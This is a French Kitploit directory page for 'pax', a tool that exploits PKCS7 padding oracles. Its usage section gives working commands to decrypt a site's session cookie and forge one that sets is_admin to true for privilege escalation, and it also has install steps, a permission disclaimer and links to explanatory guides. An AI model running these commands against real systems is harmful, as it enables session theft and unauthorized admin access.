Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
pax — :skull: :unlock: Outil en ligne de commande pour les attaques par oracle de padding PKCS7 | Kitploit
Outils/GitHubGitHub/liamg/pax
ExploitationExploitation d'Applications WebCryptographieTests d'Intrusion
GitHubliamg/pax

pax

💀 🔓 Outil en ligne de commande pour les attaques par oracle de padding PKCS7

Voir le dépôt
14217il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

pax

Travis Build Status GoReportCard

Exploitez les oracles de padding pour le plaisir et le profit !

Pax (PAdding oracle eXploiter) est un outil pour exploiter les oracles de padding afin de :

  1. Obtenir le texte clair pour un fragment donné de données chiffrées en CBC.
  2. Obtenir des octets chiffrés pour un fragment donné de texte clair, en utilisant l'algorithme de chiffrement inconnu utilisé par l'oracle.

Cela peut être utilisé pour divulguer des informations de session chiffrées, et souvent pour contourner l'authentification, élever les privilèges et exécuter du code à distance en chiffrant un texte clair personnalisé et en l'écrivant de nouveau sur le serveur.

Comme toujours, cet outil ne doit être utilisé que sur des systèmes que vous possédez et/ou pour lesquels vous avez l'autorisation de sonder !

Installation

Téléchargez depuis les releases, ou installez avec Go :

root@kitploit:~
go get -u github.com/liamg/pax/cmd/pax

Exemple d'utilisation

Si vous trouvez un oracle suspect, où les données chiffrées sont stockées dans un cookie nommé SESS, vous pouvez utiliser la commande suivante :

root@kitploit:~
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

Cela vous donnera probablement un texte clair, peut-être quelque chose comme :

root@kitploit:~
 {"user_id": 456, "is_admin": false}

On dirait que vous pouvez élever vos privilèges ici !

Vous pouvez essayer de le faire en générant d'abord vos propres données chiffrées que l'oracle déchiffrera pour obtenir un texte clair malicieux :

root@kitploit:~
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

Cela produira un autre ensemble de données chiffrées encodées en base64, peut-être quelque chose comme :

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Vous pouvez maintenant ouvrir votre navigateur et définir la valeur du cookie SESS avec la valeur ci-dessus. En chargeant la page oracle d'origine, vous devriez constater que vous avez été élevé au niveau administrateur.

Comment cela fonctionne-t-il ?

Les guides suivants expliquent en détail cette attaque :

  • https://robertheaton.com/2013/07/29/padding-oracle-attack/
  • https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth
Télécharger l’outil